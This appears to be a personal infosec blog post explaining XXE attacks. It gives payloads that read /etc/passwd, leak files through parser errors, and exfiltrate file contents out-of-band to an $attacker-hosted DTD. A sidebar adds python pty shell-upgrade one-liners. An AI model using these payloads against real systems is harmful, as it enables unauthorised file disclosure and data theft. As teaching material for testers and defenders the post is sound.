akde/infosec

Information security is ultimately about managing risk


A XML Exter­nal Enti­ty is a tech­nique where a XML file con­tains a state­ment which leads the XML pars­er to include results from an exter­nal source into the XML file. The benign idea is for exam­ple to replace a string mul­ti­ple times with a pre­de­fined value:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name "Olaf">
]>
<data>
...
<name>&name;</name>
...
</data>

Impor­tant: data is here the name of the root node. It could be root, or invoice-enti­ty, etc. Depend­ing what the DTD has defined.

Include local files

With the SYSTEM key­word, exter­nal files can be included:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<data>
...
<name>&name;</name>
...
</data>

Include external sources

To check if a XXE exist, open a local serv­er and use this:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "http://$attacker/bla">
]>
<data>
...
<name>&name;</name>
...
</data>

If the XML pars­er con­nects to the local sys­tem, well…

Or — try to include a third-par­ty source which is avail­able via the tar­get sys­tem, but not from the attack­er’s system.

Error-based exploitation

If a pars­er out­puts errors due to mal­formed XML or invalid field con­straints (length!), maybe it will also out­put ren­dered parts of the query. Example:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<data>
...
<name>fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill &name;</name>
...
</data>

If the length of the name field is too large, maybe an error is shown, which includes the inter­po­lat­ed val­ue. Try this with var­i­ous fields, for­mat vio­la­tions, etc.

Out-of-band exploitation

Exter­nal DTD files can be includ­ed. Pro­vide one on your serv­er, e.g. http://$attacker/e.dtd:

<!ENTITY % name SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM 'http://$attacker/?%name;'>" >

This defines the enti­ty exfil.

Lets use this payload:

<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://$attacker/e.dtd">
%base;
%external;
%exfil;
]>
<data>
</data>

This will load the enti­ty base (which was defined in the tar­get­ed sys­tem). Then, it eval­u­ates exter­nal. For this, the exter­nal DTD needs to be loaded. Then, it needs to eval­u­ate exfil, which per­forms the request and pass­es the val­ue to the attacker.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';